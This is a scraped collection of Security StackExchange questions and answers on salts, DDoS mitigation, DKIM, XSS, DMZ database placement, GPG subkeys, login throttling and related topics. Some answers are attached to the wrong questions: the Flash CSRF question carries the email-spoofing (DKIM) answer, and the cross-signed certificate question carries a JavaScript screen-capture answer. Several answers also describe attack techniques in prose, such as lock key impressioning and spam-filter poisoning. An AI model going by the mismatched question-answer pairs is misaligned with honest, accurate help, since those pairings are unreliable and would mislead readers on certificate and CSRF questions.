method is based on the research by Gregory et
al. [6]. It can be seen as a weak statistical attack, because it uses
purely randomized data to add to the spam e-mails. Common Words: This attack method is based on the research by Stern et al. [7]. They added common English words to spam e-mails in order
to confuse the spam filter. This attack can be seen as stronger
statistical attack than the Random Words method, because the data used
is less random and it contains words that are more likely to be in
e-mails than the words added with the previous attack. Ham Phrases: This attack is developed in this research and tested against the other two. It is based on a huge collection of ham
e-mails. From that collection, only the ham e-mails with the lowest
combined probability are used as poison. The ham e-mail is then added
at the end of the original spam e-mail. Most people read downwards, so
the effectiveness of the message is maintained. This is also a strong
statistical attack, maybe even stronger than the Common Words attack,
because the words are even less randomized. Highlights from the paper's conclusion: From a spammer’s point of view, the ‘HamPhrases’ technique seems to work best. It does decrease the performance of the spam filter. … The ‘Random’ and ‘Common Words’ techniques seem to score worse from a spammers point of view. … When we train the spam filter on those poison methods, the performance gets even better than normal. … However, the HamPhrases method used in this research is a little bit cheating. This is because both ham and spam e-mails that the spam filter uses for testing and training are available for the algorithm. Real spammers do not have the ham e-mails of real users. | {
"source": [
"https://security.stackexchange.com/questions/73181",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/34123/"
]
} |
73,258 | Is it possible to get the salt if I have the hash and original password? My gut feeling is no, but would it be impossible or will it just take very long? | Getting salt from hash(salt+password) would be just as difficult as getting password from hash(salt+password) . | {
"source": [
"https://security.stackexchange.com/questions/73258",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2625/"
]
} |
73,369 | As far as I know, I have never heard of or seen any large scale web sites like Amazon, Microsoft, Apple, Google, or Ebay ever suffer from DDoS. Have you? I have a personal philosophy that the bigger you are, the more of a target you are for such attacks. Imagine the brownie points you would get if you could bring down a major website. Yet, such sites have always remained sturdy and seemly invincible. What security measures have they implemented and can these be applied to smaller businesses? | They generally have a very layered approach. Here are some things I've either implemented or seen implemented at large organizations. To your specific question on smaller businesses you generally would find a 3rd party provider to protect you. Depending on your use case this may be a cloud provider, a CDN, a BGP routed solution, or a DNS-based solution. Bandwidth Oversubscription - This one is fairly straightforward. As you grow larger, your bandwidth costs drop. Generally large organizations will lease a significantly larger capacity than they need to account for growth and DDoS attacks. If an attacker is unable to muster enough traffic to overwhelm this, a volumetric attack is generally ineffective. Automated Mitigation - Many tools will monitor netflow data from routers and other data sources to determine a baseline for traffic. If traffic patterns step out of these zones, DDoS mitigation tools can attract the traffic to them using BGP or other mechanisms and filter out noise. They then pass the clean traffic further into the network. These tools can generally detect both volumetric attacks, and more insidious attacks such as slowloris. Upstream Blackholing - There are ways to filter UDP traffic using router blackholing. I've seen situations where a business has no need to receive UDP traffic (i.e. NTP and DNS) to their infrastructure, so they have their transit providers blackhole all of this traffic. The largest volumetric attacks out there are generally reflected NTP or DNS amplification attacks. Third Party Provider - Even many fairly large organizations fear that monster 300 Gbps attack. They often implement either a DNS-based redirect service or a BGP-based service to protect them in case they suffer a sustained attack. I would say CDN providers also fall under this umbrella, since they can help an organization stay online during an attack. System Hardening - You can often configure both your operating system and your applications to be more resilient to application layer DDoS attacks. Things such as ensuring enough inodes on your Linux server to configuring the right number of Apache worker threads can help make it harder for an attacker to take down your service. | {
"source": [
"https://security.stackexchange.com/questions/73369",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55609/"
]
} |
73,402 | Apart from SPF, what else can be done to stop hackers from spoofing your company's email addresses? | Set up Domain Keys Identified Mail on your own domain. That will digitally sign legitimate outgoing from your domain. More and more email providers are rejecting or flagging spoofed email where legit email is identified with a Domain Key signature. Your question says, "apart from SPF..." and that's what I answered. However, for others who might use this answer, SPF is another deterrent. It is easy to set up, but has some limitations that should be considered carefully. You probably want to start with a SOFTFAIL policy. | {
"source": [
"https://security.stackexchange.com/questions/73402",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/4508/"
]
} |
73,406 | I was about the Spring Security framework 's CSRF protection to see how it works. Spring doesn't use the double-submit pattern, but instead associates the CSRF token with the user's session. The documentation includes the following explaining why that is: One might ask why the expected CsrfToken isn’t stored in a cookie. This is because there are known exploits in which headers (i.e. specify the cookies) can be set by another domain. [...] See this webappsec.org thread for details on how to perform the exploit. The gist of what the webappsec.org thread says is: Attacker puts Flash document on attacker-controlled website, user visits it Flash app makes a same-origin request to the attackers website which sets the target header, and this is permitted by the crossdomain.xml on the attacker's website The attackers website responds to this request with a 302 or 307 redirect to the target website Flash (in "certain circumstances") ignores the target website's crossdomain.xml and makes the request to the target website with the extra header included My question is: is this a valid concern? I was unable to reproduce the problem by following the steps in the webappsec.org thread, and furthermore it sounds like this was a straight-up bug in Flash itself rather than any vulnerability with the double-submit cookies pattern. Although this problem resulted in at least two CVEs against web application frameworks I could not find any corresponding bug filed for Flash - but it seems like either it has been fixed since, or I was not correctly reproducing the unspecified "certain circumstances" under which this happens. | Set up Domain Keys Identified Mail on your own domain. That will digitally sign legitimate outgoing from your domain. More and more email providers are rejecting or flagging spoofed email where legit email is identified with a Domain Key signature. Your question says, "apart from SPF..." and that's what I answered. However, for others who might use this answer, SPF is another deterrent. It is easy to set up, but has some limitations that should be considered carefully. You probably want to start with a SOFTFAIL policy. | {
"source": [
"https://security.stackexchange.com/questions/73406",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/278/"
]
} |
73,451 | Posting systems are vulnerable to virus and worms and having an antivirus is almost necessary. How is it possible that hardware antiviruses don't exist? The idea sounds pretty good, if the antivirus resides on reprogrammable chips similar to the one that hosts the BIOS, then it would be immune to attacks yet still upgradeable. Also it would have higher privileges and that would solve the problem of being unable to repair in-use system files. Is there something I am not thinking of that makes this impossible to implement? | If the chip is writable from within the OS, the malware can write to it too, so it wouldn't help there. Also, anti-malware software has to handle threats that are only a few hours old. Having to reboot your computer to upgrade the anti-malware software that's running on its own hardware would suck, so we need to be able to upgrade it from within the OS. If we can write to the chip from the OS, so can the malware. In order to make a secure hardware anti-malware you first have to change the main task of the program. Anti-malware software basically have a list of malicious software. If a program is in that list, it's blocked and removed. If not, we let it run. Every time a new piece of malware is written we have to add it to the list. Thus, the software can only be reactive, with the need to update the (huge) list all the time.
If, on the other hand, you have a list of programs that are allowed to run and block everything else, you don't need to update that list all the time; only when you want to run a new program. Any malware, unknown or well known, would be blocked by this implicit deny. For many sensitive environments you don't install new code every day. ATMs need to run one piece of software. Nothing else. The list basically wouldn't change. The problem is that there is no generally feasible list of OK programs. You'd either have to have a relatively small list of the programs you need to be able to run on your computer, which has to be made specifically for you, or you'd have to have an enormous list of any programs that anyone would ever want to run. To generate that list, the easiest approach would be to add every possible program and remove all the bad ones, which is equivalent to what anti-malware software does today, rather than the implicit deny. You simply cannot build a list of all non-malicious programs that will ever be written without also including some that are malicious. It could work, if you do it right. But it's generally not feasible. Also, switching to implicit deny would be a terrible change for anti-malware companies trying to sell subscription services, since their business depends on constant signature updates. As for the extra privilege level: sometimes you have to escalate privilege, and if you can, malware will. And as for the inability to repair in-use system files: you have just added another layer, and the top layer will still have that same problem. | {
"source": [
"https://security.stackexchange.com/questions/73451",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/31356/"
]
} |
73,476 | I just noticed something weird in my browser: the certificate for www.google.com has been issued by avast! Web/Mail Shield Root . Should I be worried? I am using avast! Antivirus so it's probably a built-in feature, but I don't know why this is happening and what the benefits/risks are. | The whole goal of HTTPS is to prevent eavesdropping so that anyone monitoring your web traffic can't see what you're sending. As useful as it is, HTTPS presents a bit of a problem to antivirus software because when you visit sites over an encrypted connection, your antivirus software cannot see what sites you're visiting or what files you're downloading, at least until the download finishes. This presents a risk because if you download a virus, the antivirus software won't know about it until the download is finished and the virus is already saved to your hard drive, allowing criminals to bypass the "live defense" features of AV by simply hosting the malware on an HTTPS site. The solution that many antivirus programs use is to install its own SSL certificate as a root certificate so that it can essentially man-in-the-middle all HTTPS traffic to scan for malware. I'm guessing this is what avast! is doing. Whether this behavior presents additional security issues is debatable but I don't think it's something you need to be deeply concerned about - after all, your own antivirus software is doing the man-in-the-middling, not a malicious party. If it worries, you, you can disable this behavior - go to Settings>Active Protection>Web Shield>click on "customize" and tick the box next to "Disable HTTPS scanning." If you do this, avast! won't be able to proactively block malware on HTTPS sites. | {
"source": [
"https://security.stackexchange.com/questions/73476",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10074/"
]
} |
73,579 | I have a space for computers secured with a simple deadbolt. Someone keeps coming to pick the lock. While working there, I have scared them away three times. There are cameras, but not in useful places or all exits and the building manager won't let me run wires for more. I contacted the police, but maybe it is a low priority for them. With each subsequent visit, does a lock picker gain further progress in undermining the door's ability to keep out? Could they be doing something to the door each time that is getting them closer to being able to open the lock really quickly? Is there anything I can do to stop their ability to pick the lock? | Yes, there's a classic attack that involves incremental access. The attacker starts out with a blank key that fits into the lock in question. The attacker approaches the door, puts the key in, jiggles the key a bit, grumbles something about how the office numbers changing, and leaves. Then in private he examines the impression pattern on the key. Where there's evidence that the pins were bound, he files the key down a bit. Every day he visits the door with his increasingly-filed-down key, and every day he progressively files it down a bit more, using the impression pattern in the key as his guide. Then, one day, he'll have filed the key to match all of the pins, and the door will open. This attack has the advantage that it doesn't look like an attack. It just looks like a lost tenant who briefly visits the wrong door, and then leaves once he's realized his mistake. And when he's done, he'll have a working key. | {
"source": [
"https://security.stackexchange.com/questions/73579",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55069/"
]
} |
73,588 | Suppose we have passwords that are statistically 7-8 characters long. Is appending a 200 character long salt less secure than a 5 character salt, because of the similar hash function inputs? I was wondering: what if someone tries to guess the salt by brute forcing the salt with for example the password "123456", or another popular password that can be found in the system or even on a known password from the hacker's own account? | As Mike and Gumbo have mentioned in comments, a salt isn't intended to add protection to bad passwords. It's meant to keep the attackers from breaking the whole database at once. The length of the salt isn't meant to add difficulty to breaking the stored passwords. It's meant to ensure that your salt is reasonably unique compared to others on the Internet, and (if you're doing it right) no two of your users will have the same salt. Imagine you have 20 users who all have "god" as their password. Consider the following scenarios: Passwords are unsalted The attacker can use a precomputed table to break one user's password in very short order. On top of that, once he has the first of the 20, he'll also have the other 19 since their hashes would be identical. Passwords are salted. Salt used is fairly short. Same salt is used for all users. The attacker might have to look for a bit, but could possibly come across a precomputed table made specifically for your configuration. After that point, see scenario 1. Passwords are salted. Salt used is reasonably strong. Same salt is used for all users. Chances are, the attacker won't find a pre-computed table for your system on the Internet. He'll have to make one of his own. This will take a bit of extra time. However, after that's done, we're back to scenario 1 again. Passwords are salted. Salt used is reasonably strong. Each user has a unique salt. This is what you should be doing. Not only will the attacker not be able to find a precomputed table for your system, it's not even worth his time to make his own. Any pre-processing he might do would only work against one user. Even if he hits one of the 20 users mentioned earlier, he won't know the other 19 because the hashes will all be different. Each password must thus be individually attacked, and that's going to take awhile if you're also using a strong and slow hashing algorithm like you should be. Chances are, the weak passwords will still end up compromised eventually. It's just going to take the attacker a good bit more time to get through them all, and you won't have chunks of your users getting compromised at once just because they have the same password. So, use long salts and make them unique per-user. But don't count on that to help individual users much if they're using "god" as their password. | {
"source": [
"https://security.stackexchange.com/questions/73588",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/61366/"
]
} |
73,647 | Can JavaScript be used to capture the user’s screen? If so, is this functionality available in any JS framework? (I do not need code examples: I am mainly asking to form an opinion about the security capabilities of JavaScript.) | JavaScript has full access to the document object model, so at least in theory, it could capture what's on its own web page (but not anything outside the browser window) and there's a library to do that: http://html2canvas.hertzen.com/ (I haven't tried it.) The same-origin policy prevents JavaScript from accessing the DOM of another site. Since JavaScript cannot access the DOM of another site, it cannot leak material from the other site. So, if your question boils down to whether a script running in one tab, or even an iframe, can capture the banking password from elsewhere in the browser, then no, provided same-origin is properly implemented in the browser itself. Same origin applies to domain from which the page was served, not from which the script was served. So, my page at hxxp://bbrown.spsu.edu/ (it wasn't interesting, and now it's dead because I've retired) can load a script from google-analytics.com, as it does, and that script has access to the DOM of the page from which it was loaded; it can also send stuff back to Google through a bit of sleight-of-hand. The point is, it can do that only because I trusted Google Analytics enough to load their script in my page; the code that loads the page is in markup I wrote. If you load my page into your browser, that script from google-analytics.com can see only the DOM of my page in your browser, and not anything else you may have open in your browser. | {
"source": [
"https://security.stackexchange.com/questions/73647",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/61416/"
]
} |
73,661 | A previous question, What is the use of cross signing certificates in X.509? described cross-signed certificates well. I have a situation where the clients trust CA1 xor CA2, and both need to reach a single service. Logically, this means I need two end-entity certificates for the same hostname. From a single SSL key, I generated a single CSR and submitted to both CAs, and gotten the two separate end-entity certificates. I configured Apache to serve both certificates together and all relevant intermediates in the chain. What's gotten me stumped is the ability to get Apache mod_ssl crashes hard with [Tue Nov 25 15:28:35 2014] [error] Init: Multiple RSA server certificates not allowed' OpenSSL's s_server reads multiple -cert , -dcert arguments, takes the first RSA certificate in the last argument. Using GnuTLS either via mod_gnutls or directly, either takes just the last certificate or claims The provided X.509 certificate list is not sorted (in subject to issuer order) I think, reading RFC4158, what I'm trying to do should be valid. Where have I gone wrong? Why does cross-signing only seem to be valid among intermediate and root certificates? There is no way ahead of time to differentiate between the clients, so I can't cheat and run different vhosts on different IPs (the clients share DNS). I don't have control over getting both CAs into the clients either. The only working work-around I have so far is to push each group of clients to a unique hostname out-of-band. | JavaScript has full access to the document object model, so at least in theory, it could capture what's on its own web page (but not anything outside the browser window) and there's a library to do that: http://html2canvas.hertzen.com/ (I haven't tried it.) The same-origin policy prevents JavaScript from accessing the DOM of another site. Since JavaScript cannot access the DOM of another site, it cannot leak material from the other site. So, if your question boils down to whether a script running in one tab, or even an iframe, can capture the banking password from elsewhere in the browser, then no, provided same-origin is properly implemented in the browser itself. Same origin applies to domain from which the page was served, not from which the script was served. So, my page at hxxp://bbrown.spsu.edu/ (it wasn't interesting, and now it's dead because I've retired) can load a script from google-analytics.com, as it does, and that script has access to the DOM of the page from which it was loaded; it can also send stuff back to Google through a bit of sleight-of-hand. The point is, it can do that only because I trusted Google Analytics enough to load their script in my page; the code that loads the page is in markup I wrote. If you load my page into your browser, that script from google-analytics.com can see only the DOM of my page in your browser, and not anything else you may have open in your browser. | {
"source": [
"https://security.stackexchange.com/questions/73661",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/61430/"
]
} |
73,689 | My colleagues claim that XSS is a vulnerability on the server side. I always thought that this is a client side vulnerability. Which one of us is correct, and why? | In a cross-site scripting attack, the malicious script is run on the client, but the actual flaw is in the application. That doesn't necessarily mean that it is a strictly server-side vulnerability, in that the flaw could be in the application's JavaScript, but generally, it is indeed in server-side code, and always in code that is delivered by the server. There are client-side mitigations, such as the XSS-Protection that is now built into major browsers, or plugins that prevent the execution of JavaScript, but ultimately XSS is a web application vulnerability, and needs to be fixed by the application developers. I should mention that there is another form of XSS that exploits neither flaws in the client (the browser) nor flaws in the server (the application) but flaws in the user. This is often called Self-XSS, and exploits the willingness of a inept user to execute JavaScript he has copied and pasted from the Internet and into his browser's developer tools console, solely on base on the promise that against all hope, it will magically allow him to read his ex-girlfriend's Facebook posts despite the fact she has unfriended and blocked him. | {
"source": [
"https://security.stackexchange.com/questions/73689",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/61461/"
]
} |
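(A short, hedged illustration of the server-side fix called for in the answer to 73,689 above. It is framework-agnostic Python using only the standard library, and the function and variable names are invented for the example.)

# Sketch: HTML-encode untrusted input before echoing it into a page (reflected XSS defence).
import html

def render_comment(comment_text):
    # html.escape turns <, >, & and quotes into entities, so a payload such as
    # <script>alert(1)</script> is rendered as inert text instead of executing.
    safe = html.escape(comment_text, quote=True)
    return '<p class="comment">{}</p>'.format(safe)

if __name__ == "__main__":
    print(render_comment('<script>alert("xss")</script>'))
    # prints: <p class="comment">&lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;</p>
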
73,779 | Our security experts, database administrators, network team and infrastructure team are all saying it's OK to have the database server located in the DMZ along with the HTTP server and middle-ware server. Their reason: If the database server is compromised (because of an insecure middle
tier), at least the database server is outside the internal system. If it is
inside our network, the hacker can then use the database server to access
other systems. What they are saying is: Let's not put the middle-ware server behind a second firewall and the database
server behind a third firewall. Let's use just one firewall (the HTTP server's) in case a hacker wants
to get our database's sensitive data, at least that's all they can get. The second statement was actually said... verbatim. Please note that this database server will hold sensitive information, including bank details. Now, are these experts making any sense to you?
I'm a software developer, and I can't get their logic. It's like, "Put the jewelry box outside the house so that robbers won't bother getting in for the TV?" | SANS' "Making Your Network Safe for Databases" ( http://www.sans.org/reading-room/whitepapers/application/making-network-safe-databases-24 ) reads a little dated in some sections, but provides a decent "for dummies" level of guidance in the direction you're after. You could also exhaust yourself poking through the US NIST's resource centre ( http://csrc.nist.gov/ ). I think ISO's ISO/IEC 27033-2:2012 would be on topic too, but don't have a copy at hand to be sure. You're trying to separate/isolate the most sensitive servers (the database servers) from the most exposed (and therefore vulnerable). You're proposing a "defense in depth" approach, that seeks to
a) prevent attacks where possible, and
b) delay their progress (and access to the important stuff) when not. Ideally, everything is always hardened and patched, servers only listen for traffic on required ports, and only from allowed devices, all traffic "in flight" is inaccessible to unauthorized listeners (through encryption and/or isolation), and everything is monitored for intrusion and integrity. If all that is in place with 100% certainty, then great, your "opposition" have addressed point a) above, as much as is possible . Great start, but what about point b)? If a web server does get compromised, your proposed architecture is in a much better spot. Their potential attack footprint, and vector, is much larger than it needs to be. The justification for separate database from web servers is no different than the justification they've accepted for separating web servers from LAN. More bluntly: if they're so convinced a compromised web server presents no danger to other systems in the same security zone, why do they think a DMZ is required at all? It's awfully frustrating to be in your situation. At the very least, in your position I'd create a risk memo outlining your concerns and suggestions, and ensure they acknowledge it. CYA, anyway. | {
"source": [
"https://security.stackexchange.com/questions/73779",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/61522/"
]
} |
73,862 | An Ubuntu server of my company has been hacked to carry out a DoS attack. I found the shellshock bug had not been fixed by my colleagues, and I think it's the problem.
Then I found an ELF file that sends thousands of messages, and the script is auto-generated by something. Even if I remove it, it recreates itself under a new name (in /boot, /etc/init.d).
Besides, I see the netstat command doesn't show me all the real open ports. Maybe the command has been replaced? How is it possible to re-install it? | You should "nuke it from orbit": wipe and reinstall the OS and applications from clean source media, and then carefully restore the data from backup. | {
"source": [
"https://security.stackexchange.com/questions/73862",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/61579/"
]
} |
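(Before the wipe recommended in the answer to 73,862 above, it can still be useful to document which binaries were swapped. A hedged sketch for Debian/Ubuntu systems: it compares installed files against the MD5 sums dpkg recorded at install time, and it assumes the dpkg database itself is intact — a rootkit can defeat exactly this kind of check, which is why the reinstall advice still stands. net-tools is the package that ships netstat.)

# Sketch: flag files of a package that no longer match dpkg's recorded MD5 sums.
import hashlib
from pathlib import Path

def changed_files(package):
    md5file = Path("/var/lib/dpkg/info/{}.md5sums".format(package))
    for line in md5file.read_text().splitlines():
        recorded, relpath = line.split(None, 1)
        path = Path("/") / relpath
        if not path.is_file():
            yield path, "missing"
        elif hashlib.md5(path.read_bytes()).hexdigest() != recorded:
            yield path, "modified"

if __name__ == "__main__":
    for path, status in changed_files("net-tools"):
        print(status, path)
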
73,917 | I am developing a web page where people can write and comment things (no personal information required) and I need to put in a login form so users can see all their actions on my web page. My idea is to program a login form without SSL and also allow people to log in with Facebook if they prefer. The page will load completely only if JavaScript is enabled. My first problem is making sure that nobody can steal the user credentials by acting like a man in the middle. I thought of solving it with a first hashing on the client side with JavaScript and then, on the server side, if I receive hashed values (in case someone deletes some JavaScript), a second hashing, and storing those hashed values in the user database. Is this a safe way to implement it? Also, are there any chances that some data get lost? If so, how can I know if the received data is not compromised? Protect from dictionary and brute force attacks. I would solve it by counting the number of failed login attempts associated with that user account and, if it is more than 8-10 in a row, showing a CAPTCHA at each of the next logins and also implementing a time delay between successive login attempts. I think in this way IP changes are not going to be a problem because I am counting the number of failed logins on the server side (I would set a user variable in PHP). The login form. I implemented it in this way (without the hashing for now): <input id="username" name="userName" placeholder="Username" type="text">
<input id="password" name="pass" placeholder="Password" type="password"> But when the form is sent, I can read the password in the URL, like: /LogIn.php?userName=user&pass=pass How can I hide the password? What other good advice could I follow to achieve as much security as I can without using SSL? | Why are you refusing to use TLS? It works, it has a good track record (some minor exceptions aside). Refusing to use good tools without a compelling reason does not engender confidence and does not immediately suggest professionalism. Additionally, do not roll your own authentication system. That is silly, and you will make mistakes. Instead, since you expect your users to have a Facebook account, use OAuth2 to consume federated identity and authentication. Even better, outsource this to a federation service that has mastered it and even provides code snippets ( https://oauth.io/ comes to mind). Don't make your life difficult. | {
"source": [
"https://security.stackexchange.com/questions/73917",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55406/"
]
} |
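(To make the "consume federated identity via OAuth2" advice in the answer to 73,917 above concrete, here is a rough sketch using the requests-oauthlib library. The client ID/secret and redirect URI are placeholders from a hypothetical app registration, the Facebook endpoint URLs are the ones used in that library's documentation and may need updating, and the callback URL must itself be served over TLS in any real deployment.)

# Sketch: OAuth2 authorization-code flow with requests-oauthlib; all credentials are placeholders.
from requests_oauthlib import OAuth2Session
from requests_oauthlib.compliance_fixes import facebook_compliance_fix

CLIENT_ID = "your-app-id"            # placeholder
CLIENT_SECRET = "your-app-secret"    # placeholder
REDIRECT_URI = "https://example.com/oauth/callback"

oauth = facebook_compliance_fix(OAuth2Session(CLIENT_ID, redirect_uri=REDIRECT_URI, scope=["email"]))

# Step 1: send the user to the provider's consent page.
auth_url, state = oauth.authorization_url("https://www.facebook.com/dialog/oauth")
print("Redirect the user to:", auth_url)

# Step 2: the provider redirects back with a code; exchange it for a token.
callback = input("Paste the full callback URL here: ")
token = oauth.fetch_token(
    "https://graph.facebook.com/oauth/access_token",
    client_secret=CLIENT_SECRET,
    authorization_response=callback,
)
print("Token received; the provider, not your site, handled the password.")
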
73,963 | I'm planning to purchase an SSL certificate for one of my sites, but I'm concerned about points made in these articles: WiredTree: The Most Significant Issue With SSL – And How To Solve It TechRepublic: POODLE vulnerability hastens the death of SSL 3.0 Infosec Island:
IPv6 - The Death of SSL This POODLE Bites: Exploiting The SSL 3.0 Fallback Is SSL secure any more? What are they talking about? I thought SSL was bullet-proof, but now I'm confused. If SSL is not secure any more, with regard to safeguarding the information exchanged between my clients and my server via HTTP, what are my options other than an SSL certificate? | All except the third link refer to SSLv3 (version 3), which is affected by the POODLE vulnerability. You should be using the TLS protocol, which is the successor of SSL and is not affected. You should configure your web server to support TLS 1.0, 1.1 and 1.2, which should cover most devices out there save for a few archaic ones like IE 6.0, while still remaining secure. The certificate used for both protocols is the same. Most mass media websites refer to TLS/SSL as simply SSL. They are actually two separate protocols. More information here : What's the difference between SSL, TLS, and HTTPS? As for the third link, it refers to IPv6 superseding SSL. My opinion is that it will take at least a few more years for IPv6 to become the de-facto addressing scheme. In the meantime, an SSL certificate will secure your site. After all, you can buy a cert for a 1-2 year duration if you are afraid it will become obsolete in the near future. | {
"source": [
"https://security.stackexchange.com/questions/73963",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/37952/"
]
} |
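(A quick companion to the answer to 73,963 above: once SSLv3 is disabled on the server, you can confirm from a client which protocol is actually negotiated. Standard-library Python, 3.7 or newer for ssl.TLSVersion; example.com stands in for your own hostname.)

# Sketch: check that a server negotiates TLS 1.2+ and refuses anything older.
import socket
import ssl

HOST = "example.com"  # stand-in for your own site

context = ssl.create_default_context()
context.minimum_version = ssl.TLSVersion.TLSv1_2   # refuse SSLv3 / TLS 1.0 / TLS 1.1

with socket.create_connection((HOST, 443), timeout=5) as sock:
    with context.wrap_socket(sock, server_hostname=HOST) as tls:
        print("Negotiated:", tls.version())    # e.g. TLSv1.2 or TLSv1.3
        print("Cipher suite:", tls.cipher()[0])
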
74,067 | I'm trying to export the public component of my subkey, but all GPG will give me is the public component of my master key. The keyring is set up like this . $ gpg -K
/home/alex/.gnupg/secring.gpg
-------------------------------------------------------
sec# 4096R/4ACA8B96 2014-06-21 [expires: 2015-06-21]
uid Alex Jordan <[email protected]>
ssb 4096R/633DBBC0 2014-06-21
ssb 4096R/93A31C56 2014-06-21
$ gpg --armor --export 93A31C56
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v2.0.22 (MingW32)
...
-----END PGP PUBLIC KEY BLOCK----- The key that is output to the console is the public component of 4ACA8B96, not the requested key. Is there a technical limitation that's preventing this from working, or is it just GPG being stubborn? | RFC 4880, OpenPGP, 11.1. Transferable Public Keys defines that subkey packets are always preceded by a public (primary) key, thus GnuPG does not allow exporting one separately. To do so anyway, export the key (it is recommended to use --export-options export-minimal to reduce the number of packets you have to deal with), and use gpgsplit on it, which will decompose the OpenPGP file into the individual packets. Those ending in public_subkey are the ones you're looking for. To find out which one is the right one, have a look at them using pgpdump [file] ( gpg --list-packets fails for single packets, as the input is not a valid OpenPGP file). pgpdump should be available for most distributions in a package of the same name. | {
"source": [
"https://security.stackexchange.com/questions/74067",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9571/"
]
} |
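(The gpgsplit/pgpdump procedure from the answer to 74,067 above, wrapped in a small script for convenience. It assumes gpg, gpgsplit and pgpdump are on PATH; 93A31C56 is the subkey ID from the question and should be replaced with your own.)

# Sketch: export a key minimally, split it into OpenPGP packets, and dump the subkey packets.
import glob
import os
import subprocess
import tempfile

KEYID = "93A31C56"  # replace with your own key ID

workdir = tempfile.mkdtemp(prefix="subkey-")
exported = os.path.join(workdir, "key.gpg")

with open(exported, "wb") as out:
    subprocess.run(["gpg", "--export-options", "export-minimal", "--export", KEYID],
                   stdout=out, check=True)

subprocess.run(["gpgsplit", exported], cwd=workdir, check=True)   # one file per packet

for packet in sorted(glob.glob(os.path.join(workdir, "*public_subkey*"))):
    print("==", os.path.basename(packet))
    subprocess.run(["pgpdump", packet], check=True)
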
74,120 | I don't share any personal information with StackExchange, I'm not really worried about anyone trying to hack my account and I can't see any incentive for them to do so, and yet the password strength requirements are about the strongest I've ever seen. Why does this site, and others, insist on strong passwords? What's the reasoning behind it? I can understand why my bank might insist on high security, but isn't it up to me how secure I want to be on here? | Do you remember earlier this year when Apple's cloud was hacked? Well, Apple's cloud wasn't hacked . Some celebrities with really weak passwords had their passwords guessed. But the headlines will still read that Apple's cloud got hacked. And that is why you don't allow users to use really weak passwords. | {
"source": [
"https://security.stackexchange.com/questions/74120",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/61815/"
]
} |
74,211 | I am currently working on the redesign of a login page. I have initially suggested that login be throttled whereby pauses (incremental - in number of seconds) are introduced between each failed login attempt. The idea is that this will allow us to avoid locking the account and give users time to think about reseting their password and also counter any brute force attacks. The development team suggested that login throttling will not help in preventing brute force attacks but a temporary lockout will. The temporary lockout works in the same way except that pauses introduced are (incremental - in number of mins and hours) so I am a bit confused...below is an example of how IBM QuickFile allows login to be configured: So I have a number of questions: Is a temporary lockout just another term for login throttling? What is the difference between login throttling and temporary lockout ? Are they the same but use different configuration parameters. for example 3-6-12 seconds vs 5 -10 - 20 mins ? What are the interaction design implications that I need to consider when adopting a temporary lockout mechanism? Can I let the user know when they will be able to try again? Perhaps using some form of visual indicator? What are the most adapted time-frames for pauses between failed login attempts that will not frustrate the end user? This post on stakoverflow seems to suggest seconds rather than mins What impact does this have on Denial of Service ? Update: Clarifications A bit more to clarify! when a Login fails the "try again" button is disabled a for a duration of 3 sec after which it is enabled.The user attempts to login again and fails, the "try again" button becomes inactive for 6 sec. The process is repeated for 5 consecutive attempts and error messages direct users to reset their password.At the 5th attempt users are presented with a password reset screen. On the other hand users could attempt to login and have a specified number of attempts after which the account is "locked" for a period of time, say 5 mins this increases to 10 mins after another set of attempts. Thanks | A) Yep you got it. Same in that they both result from a failed login attempt(s), though they differ in things like logging, the resulting UX implementation, and when one is used. If a user is temporarily locked out, this is email-worthy. You should send an email or text-message to them notifying them that enough failed attempts were made to warrant a temporary lockout. This is an opportunity to empower the user to intervene in the event that it isn't them attempting to log in. Alternatively you could use just a lockout timer in minutes, but requiring action from the user to unlock the account would be more ideal. Throttling is more for pacing. "hold your horses, take a breath" and can be done without even informing the user. A simple UI spinner element can be used to prevent the user from accidental double-form-submits and prevent rapid attempts over the span of seconds as opposed to minutes or hours. This can also be used as an opportunity to detect bruteforce attempts if the attacker isn't going through your UI. If 3 attempts are made per second but your UI only allows 1 attempt every 3 seconds, something is amiss. | {
"source": [
"https://security.stackexchange.com/questions/74211",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/61875/"
]
} |
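(A sketch of the two behaviours discussed in 74,211 above, side by side: per-attempt throttling measured in seconds and a temporary lockout measured in minutes. The thresholds mirror the example values in the question, and the in-memory dicts stand in for whatever session or database storage the real application uses.)

# Sketch: login throttling (seconds) vs temporary lockout (minutes); storage is illustrative only.
import time

THROTTLE_STEPS = [0, 3, 6, 12]    # delay imposed after 0, 1, 2, 3+ consecutive failures
LOCKOUT_THRESHOLD = 5             # consecutive failures before a temporary lockout
LOCKOUT_MINUTES = 5

failures = {}       # username -> consecutive failure count
locked_until = {}   # username -> unix timestamp when the lockout expires

def delay_before_next_attempt(user):
    now = time.time()
    if locked_until.get(user, 0) > now:
        return locked_until[user] - now                      # lockout: tell the user when to retry
    step = min(failures.get(user, 0), len(THROTTLE_STEPS) - 1)
    return THROTTLE_STEPS[step]                              # throttling: a short pause only

def record_failure(user):
    failures[user] = failures.get(user, 0) + 1
    if failures[user] >= LOCKOUT_THRESHOLD:
        locked_until[user] = time.time() + LOCKOUT_MINUTES * 60
        # lockouts are email-worthy, per the answer above; notify the account owner here

def record_success(user):
    failures.pop(user, None)
    locked_until.pop(user, None)
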
